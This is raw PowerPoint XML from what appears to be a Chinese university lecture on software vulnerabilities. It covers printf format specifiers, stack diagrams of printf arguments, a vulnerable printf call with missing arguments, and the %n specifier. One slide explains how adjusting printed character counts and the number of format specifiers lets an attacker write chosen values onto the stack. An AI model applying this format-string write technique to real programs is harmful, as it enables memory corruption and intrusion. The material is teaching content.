              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>整型 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>(like %d)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>%o          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>八进制整型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>%p          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>地址指针</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>%s          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>字符串</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>x,%X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>十六进制整型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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格式化输出示例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="870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pic>
        <p:nvPicPr>
          <p:cNvPr id="87044" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="1268413"/>
            <a:ext cx="5853113" cy="2736850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="圆角矩形标注 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5691188" y="4830763"/>
            <a:ext cx="1833562" cy="1079500"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -65760"/>
              <a:gd name="adj2" fmla="val -215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带圈部分删除会有什么结果？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="椭圆 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5003800" y="2636838"/>
            <a:ext cx="863600" cy="576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漏洞示意</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="880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printf(“a=%d,b=%d”,a,b);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547813" y="2060575"/>
            <a:ext cx="1871662"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a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547813" y="2781300"/>
            <a:ext cx="1871662"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格式化串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547813" y="3500438"/>
            <a:ext cx="1871662"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变量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>a)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547813" y="4221163"/>
            <a:ext cx="1871662"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变量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="直接箭头连接符 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1114425" y="1873250"/>
            <a:ext cx="1588" cy="350043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8073" name="文本框 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="747713" y="1447800"/>
            <a:ext cx="869950" cy="369888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>低地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88074" name="文本框 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="5405438"/>
            <a:ext cx="869950" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>高地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88075" name="文本框 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="822325" y="3244850"/>
            <a:ext cx="654050" cy="646113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>栈中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>参数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4170363" y="2765425"/>
            <a:ext cx="1873250"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a=%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>d,b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>=%d</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="直接箭头连接符 14"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3419475" y="3125788"/>
            <a:ext cx="750888" cy="158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肘形连接符 16"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4024313" y="2881312"/>
            <a:ext cx="477838" cy="168751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肘形连接符 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3419475" y="3500438"/>
            <a:ext cx="2305050" cy="1081087"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -174"/>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0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a:t>printf(“a=%d,b=%d”);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763713" y="2565400"/>
            <a:ext cx="1871662"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a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763713" y="3284538"/>
            <a:ext cx="1871662"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格式化串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763713" y="4005263"/>
            <a:ext cx="1871662"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a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763713" y="4724400"/>
            <a:ext cx="1871662"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="直接箭头连接符 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1330325" y="2378075"/>
            <a:ext cx="1588" cy="350043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9097" name="文本框 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="963613" y="1952625"/>
            <a:ext cx="869950" cy="369888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>低地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89098" name="文本框 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1042988" y="5910263"/>
            <a:ext cx="869950" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>高地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89099" name="文本框 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1038225" y="3749675"/>
            <a:ext cx="654050" cy="646113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>栈中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>参数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4386263" y="3270250"/>
            <a:ext cx="1873250"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a=%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>d,b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>=%d</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="直接箭头连接符 12"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3635375" y="3630613"/>
            <a:ext cx="750888" cy="1428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肘形连接符 13"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4241007" y="3385343"/>
            <a:ext cx="476250" cy="168751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肘形连接符 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3635375" y="4005263"/>
            <a:ext cx="2305050" cy="1079500"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -174"/>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可写入内存操作</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="901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例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>int a=0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>printf(“1234567890%n”,&amp;a);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>=10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="716087" y="4077072"/>
            <a:ext cx="7816353" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>用于把前面打印的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>字符数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>记录到一个变量中，也用于统计格式化的字节数。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格式化串漏洞利用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="911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通过改变格式化串中输出字符数的多少实现修改要在指定地址写入的值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过改变格式化串中格式符的个数，调整格式符对应参数在栈中位置，从而实现对栈中特定位置数据的修改</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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格式化漏洞例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="921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下面的程序输出结果是什么？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="内容占位符 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8218488" cy="45259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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int main(void)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	char string[]="Hello World!";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("String: %s,arg2: %p,arg3: %p\n", string);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFil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利用软件漏洞攻击的实例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112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11268" name="矩形 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="1368425"/>
            <a:ext cx="4421187" cy="522288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>勒索者病毒（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2017-2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11269" name="矩形 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="755650" y="1946275"/>
